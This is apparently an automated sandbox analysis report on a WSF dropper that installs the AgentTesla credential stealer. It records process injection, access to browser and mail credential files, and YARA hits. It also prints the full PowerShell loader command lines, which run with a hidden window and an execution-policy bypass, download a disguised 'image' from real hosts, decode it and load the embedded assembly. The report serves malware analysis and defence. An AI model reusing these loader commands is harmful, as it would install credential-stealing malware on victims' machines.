Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 814008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDkDgTreLwDgTreyDgTreDIDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredwBzDgTreGYDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDcDgTreODgTreDgTreyDgTreDYDgTreNwDgTre0DgTreDMDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreDoDgTreLwDgTrevDgTreDQDgTreNQDgTreuDgTreDcDgTreNDgTreDgTreuDgTreDEDgTreOQDgTreuDgTreDgDgTreNDgTreDgTrevDgTreHgDgTreYQBtDgTreHDgTreDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB3DgTreHMDgTreZgDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreH	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/739/228/original/new_image_wsf.jpg?1707826743', 'http://45.74.19.84/xampp/bkp/new_image_wsf.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.diord46esab/19.412.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtredkdgtrelwdgtreydgtredidgtreodgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredwbzdgtregydgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrewdgtredcdgtreodgtredgtreydgtredydgtrenwdgtre0dgtredmdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtredodgtrelwdgtrevdgtredqdgtrenqdgtreudgtredcdgtrendgtredgtreudgtrededgtreoqdgtreudgtredgdgtrendgtredgtrevdgtrehgdgtreyqbtdgtrehdgtredgtrecdgtredgtrevdgtregidgtreawbwdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrexwb3dgtrehmdgtrezgdgtreudgtregodgtrecdgtrebndgtreccdgtrekqdgtre7dgtrecdgtredgtrejdgtrebpdgtreg0dgtreyqbndgtregudgtreqgb5dgtreh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/739/228/original/new_image_wsf.jpg?1707826743', 'http://45.74.19.84/xampp/bkp/new_image_wsf.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.diord46esab/19.412.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','addinprocess32',''))} }
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtredkdgtrelwdgtreydgtredidgtreodgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredwbzdgtregydgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrewdgtredcdgtreodgtredgtreydgtredydgtrenwdgtre0dgtredmdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtredodgtrelwdgtrevdgtredqdgtrenqdgtreudgtredcdgtrendgtredgtreudgtrededgtreoqdgtreudgtredgdgtrendgtredgtrevdgtrehgdgtreyqbtdgtrehdgtredgtrecdgtredgtrevdgtregidgtreawbwdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrexwb3dgtrehmdgtrezgdgtreudgtregodgtrecdgtrebndgtreccdgtrekqdgtre7dgtrecdgtredgtrejdgtrebpdgtreg0dgtreyqbndgtregudgtreqgb5dgtreh	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/739/228/original/new_image_wsf.jpg?1707826743', 'http://45.74.19.84/xampp/bkp/new_image_wsf.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.diord46esab/19.412.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','addinprocess32',''))} }	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Tries to harvest and steal browser information (history, passwords, etc)

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3359661563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1812, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3367046963.0000000002915000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3359661563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1812, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3359661563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1812, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	22 Scripting	Valid Accounts	231 Windows Management Instrumentation	22 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	311 Process Injection	2 Obfuscated Files or Information	LSASS Memory	34 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	531 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	261 Virtualization/Sandbox Evasion	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	261 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rdevuelto_Pagos.wsf	8%	ReversingLabs	Script.Dropper.Heuristic

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://crl.microsoft	0%	URL Reputation	safe
